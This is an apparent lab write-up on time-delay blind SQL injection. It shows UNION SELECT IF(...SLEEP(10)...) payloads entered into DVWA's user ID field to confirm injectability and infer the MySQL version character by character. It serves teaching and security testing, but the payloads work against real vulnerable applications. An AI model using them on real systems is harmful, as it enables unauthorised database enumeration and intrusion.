SQL INJECTION - BLIND (II): TIME DELAY BASED ATTACKS
- Layout for this exercise:
1 - Introduction
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Time_delay_Exploitation_technique
- This type of attack uses database commands like sleep() or benchmark() to delay answers in conditional queries.
- sleep(time) suspends the execution of a command for time seconds.
- benchmark(count, expression) repeatedly executes an expression by count times
- This attack would be useful when the attacker doesn’t have any kind of answer (result / output / error) from the application because the input validation has been sanitized.
- Using this method an attacker could enumerate many elements of the database.
- For instance, using sleep(10) and a conditional loop for the 1st letter of the database's being 'A', if the answer comes after 10 seconds, we can conclude that the condition is true; otherwise the application would not respond
2 - Examples of Time Delay Blind SQL injection
- These SQL injection time delay based exercises will be performed from a Kali Linux device against a DVWA version 1.0.8 MySQL database, with a setup of "medium"security level, stored at an Ubuntu Linux device running the XAMPP web server.
- Going to the SQL Injection (Blind) tab, the following SQL entries (written in green) will be introduced at the user ID form.
2.1) Finding whether the application is responsive to time based attacks
1 UNION SELECT IF (1=1, SLEEP(10), NULL), NULL
- Let's notice the Connecting notification lasting for 10 seconds, so we can conclude that te application is responsive to this type of attack:
- The real SQL query would be:
SELECT first_name,last_name FROM users WHERE ID=1
UNION
SELECT IF (1=1,SLEEP(10),NULL),NULL
2.2) Finding whether the database version is 5
1 UNION SELECT IF (SUBSTRING(VERSION), 1, 1) = 5, SLEEP(10), NULL), NULL
- Again, the result is obtained after waiting for 10 seconds:
- We can conclude that the version is actually 5 (conditional loop) because there is no error message answer and the query injection is successful.
- The real SQL query would be:
SELECT first_name,last_name FROM users WHERE ID=1
UNION
SELECT IF (SUBSTRING(version(),1,1)=5, SLEEP(10),NULL),NULL
- The second part of the command consists of IF(condition, true statement, false statement), where:
- condition= SUBSTRING(version(),1,1)=5
- true statement=SLEEP(10)
- false statement=NULL
- SUBSTRING (text, start, length) returns a substring starting from the position "start" of text and of length "length".
- In this case the conditional loop SUBSTRING(version(),1,1)=5 is TRUE because the database version starts by 5, actually 5.5.27, and as a consequence the SLEEP(10) true statement is successfully performed.